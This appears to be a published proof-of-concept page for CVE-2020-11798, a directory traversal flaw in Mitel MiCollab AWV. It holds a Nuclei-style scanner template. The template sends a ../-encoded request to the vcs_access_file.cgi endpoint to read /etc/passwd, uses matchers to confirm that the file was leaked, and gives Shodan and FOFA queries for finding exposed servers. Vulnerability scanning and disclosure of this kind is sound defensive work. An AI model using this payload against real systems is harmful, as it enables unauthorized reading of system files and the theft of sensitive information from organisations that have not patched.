CVE-2020-11798: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal

2025-08-01 Mitel MiCollab AWV PoC Public

Description

A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.

PoC

id: CVE-2020-11798

info:
  name: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal
  author: ritikchaddha
  severity: medium
  description: |
    A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.
  impact: |
    An attacker can exploit this vulnerability to view, modify, or delete arbitrary files on the system, potentially leading to unauthorized access or data leakage.
  remediation: |
    Apply the latest security patches or updates provided by Mitel to mitigate the vulnerability and prevent unauthorized access.
  reference:
    - https://packetstormsecurity.com/files/171751/mma913-traversallfi.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11798
    - http://packetstormsecurity.com/files/171751/Mitel-MiCollab-AWV-8.1.2.4-9.1.3-Directory-Traversal-LFI.html
    - https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin-20-0005-01.pdf
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-20-0005
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-11798
    cwe-id: CWE-22
    epss-score: 0.48771
    epss-percentile: 0.98813
    cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mitel
    product: micollab_audio\,_web_\&_video_conferencing
    shodan-query:
      - html:"Mitel" html:"MiCollab"
      - http.html:"mitel" html:"micollab"
    fofa-query: body="mitel" html:"micollab"
  tags: cve,cve2020,packetstorm,mitel,micollab,lfi,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - application/x-download
          - filename=passwd
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022073fd367559db60449236589a13830bf22f534159eace43bbff5e7f62a93df157022058f4b6dd6a7d7bc95af8f7f003024831c494b844f224b6fcc479a8061dd5c9c0:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities